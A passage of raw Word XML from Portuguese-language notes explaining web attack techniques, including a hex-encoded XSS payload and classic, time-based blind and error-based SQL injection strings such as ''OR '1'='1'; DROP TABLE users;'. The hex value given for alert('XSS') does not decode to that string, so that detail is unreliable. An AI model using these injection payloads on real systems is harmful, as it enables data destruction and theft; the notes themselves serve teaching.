          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hex Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CA758" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRPr="007A4502" w:rsidRDefault="00FF190E" w:rsidP="00FF190E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exemplo: alert('XSS')</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode ser codificado como </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>616c657274282753535229</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> em hexadecimal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17BB1F" w14:textId="77777777" w:rsidR="007A4502" w:rsidRPr="00FF190E" w:rsidRDefault="007A4502" w:rsidP="007A4502">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FBE16C" w14:textId="3C726137" w:rsidR="006E7A3B" w:rsidRPr="009E5B4F" w:rsidRDefault="00FF190E" w:rsidP="007A4502">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Essas técnicas não são exclusivas para payloads maliciosos; elas também são utilizadas para diversos propósitos legítimos, como garantir a transmissão segura de dados ou representar caracteres especiais em URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8D698" w14:textId="77777777" w:rsidR="006E7A3B" w:rsidRPr="009E5B4F" w:rsidRDefault="006E7A3B" w:rsidP="006E7A3B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118856AB" w14:textId="0F7BA83E" w:rsidR="002844BF" w:rsidRDefault="003D002C" w:rsidP="00462FBB">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Há diversos tipos e técnicas de SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="008D18A8">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, dentre elas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D2310" w14:textId="77777777" w:rsidR="003D002C" w:rsidRDefault="003D002C" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02ED826A" w14:textId="634EF9CA" w:rsidR="003D002C" w:rsidRPr="005150DF" w:rsidRDefault="003D002C" w:rsidP="005150DF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Classic SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="00F640B0" w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Comandos múltiplos</w:t>
      </w:r>
      <w:r w:rsidR="00646675" w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Destrutivo</w:t>
      </w:r>
      <w:r w:rsidR="00F640B0" w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0DD9E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injeta código SQL malicioso por meio de entradas do usuário em campos de formulários ou parâmetros de URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5832F0AF" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00AC7EAA" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'input'; DROP TABLE users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14022969" w14:textId="77777777" w:rsidR="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBF98BE" w14:textId="77777777" w:rsidR="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obs: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">O trecho </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'input'</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> é uma string literal usada como valor para a condição </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHERE username = 'input'.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Isso é apenas um exemplo genérico, e a intenção não é buscar um usuário chamado 'input', mas sim ilustrar um ponto sobre injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67863CEB" w14:textId="77777777" w:rsidR="00AC7EAA" w:rsidRPr="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A53AB75" w14:textId="1D3BB4C1" w:rsidR="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>A ideia por trás de uma injeção de SQL é explorar vulnerabilidades em um sistema que não v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>lida ou trata adequadamente as entradas do usuário. Se um usuário mal-intencionado inserir algo como</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCFA4E0" w14:textId="77777777" w:rsidR="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A12B3A1" w14:textId="6237043F" w:rsidR="00AC7EAA" w:rsidRPr="002512A2" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OR </w:t>
      </w:r>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>'1'='1'</w:t>
      </w:r>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">; DROP TABLE </w:t>
      </w:r>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9CDDA2" w14:textId="77777777" w:rsidR="00AC7EAA" w:rsidRPr="002512A2" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3971708A" w14:textId="18AC88B8" w:rsidR="00AC7EAA" w:rsidRPr="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>A consulta resultante seria algo assim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D84D74" w14:textId="77777777" w:rsidR="00AC7EAA" w:rsidRPr="002512A2" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D2A7F1" w14:textId="334756F4" w:rsidR="00AC7EAA" w:rsidRDefault="00AC7EAA" w:rsidP="00AC7EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '' OR </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'1'='1'</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; DROP TABLE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7EAA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D0CC8" w14:textId="77777777" w:rsidR="008E6746" w:rsidRDefault="008E6746" w:rsidP="008E6746">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093DA1BA" w14:textId="7D4B5AA5" w:rsidR="008E6746" w:rsidRPr="008E6746" w:rsidRDefault="008E6746" w:rsidP="008E6746">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">A condição </w:t>
      </w:r>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHERE username = '' OR '1'='1'</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> sempre é verdadeira </w:t>
      </w:r>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>('1'='1' é uma expressão verdadeira em SQL),</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> o que significa que a consulta retornaria todos os registros da tabela "users". </w:t>
      </w:r>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Além disso, a parte DROP TABLE users</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6746">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>; é uma instrução SQL adicional que tentaria excluir a tabela "users".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D9E28" w14:textId="77777777" w:rsidR="0051158A" w:rsidRDefault="0051158A" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B785D1" w14:textId="77777777" w:rsidR="00924FF6" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F109839" w14:textId="77777777" w:rsidR="00924FF6" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290D2EE8" w14:textId="77777777" w:rsidR="00924FF6" w:rsidRPr="008E6746" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354844EA" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="005150DF" w:rsidRDefault="003D002C" w:rsidP="005150DF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Time-Based Blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30888898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explora a capacidade do banco de dados de pausar antes de responder para determinar se uma condição é verdadeira ou falsa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ED02EB" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00157D73" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'admin' AND IF(1=1, SLEEP(5), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E18AB1" w14:textId="77777777" w:rsidR="006D3F87" w:rsidRPr="00157D73" w:rsidRDefault="006D3F87" w:rsidP="006D3F87">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4256C8C6" w14:textId="48941C3E" w:rsidR="00157D73" w:rsidRDefault="00157D73" w:rsidP="00157D73">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157D73">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs: `AND IF(1=1, SLEEP(5), 0)`</w:t>
      </w:r>
      <w:r w:rsidRPr="00157D73">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta parte parece ser uma condição que envolve uma função condicional IF. Se 1 for igual a 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00104D15">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(o que sempre é verdadeiro),</w:t>
      </w:r>
      <w:r w:rsidRPr="00157D73">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> a função SLEEP(5) é chamada, o que faz o sistema esperar por 5 segundos. Caso contrário, 0 é retornado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03150EEE" w14:textId="77777777" w:rsidR="006D3F87" w:rsidRPr="00157D73" w:rsidRDefault="006D3F87" w:rsidP="00157D73">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16611B7D" w14:textId="77777777" w:rsidR="00157D73" w:rsidRPr="00157D73" w:rsidRDefault="00157D73" w:rsidP="00157D73">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157D73">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>O objetivo dessa injeção de SQL parece ser causar um atraso de 5 segundos se a condição for verdadeira. Isso poderia ser uma tentativa de explorar a vulnerabilidade de tempo de execução para determinar se o sistema é suscetível a ataques de injeção de SQL baseados em tempo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57203BF8" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00157D73" w:rsidRDefault="003D002C" w:rsidP="00752588">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F95A0BA" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="005150DF" w:rsidRDefault="003D002C" w:rsidP="005150DF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error-Based SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A43D19E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provoca erros no banco de dados para extrair informações sobre a estrutura ou dados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1954B415" w14:textId="77777777" w:rsidR="0007646E" w:rsidRPr="005B0C40" w:rsidRDefault="003D002C" w:rsidP="0007646E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'admin' AND 1=CONVERT(int, (SELECT @@version));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515AF1B" w14:textId="77777777" w:rsidR="005B0C40" w:rsidRPr="005B0C40" w:rsidRDefault="005B0C40" w:rsidP="005B0C40">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229A895A" w14:textId="3FF3BA65" w:rsidR="005B0C40" w:rsidRDefault="005B0C40" w:rsidP="005B0C40">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AND 1=CONVERT(int, (SELECT @@version))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
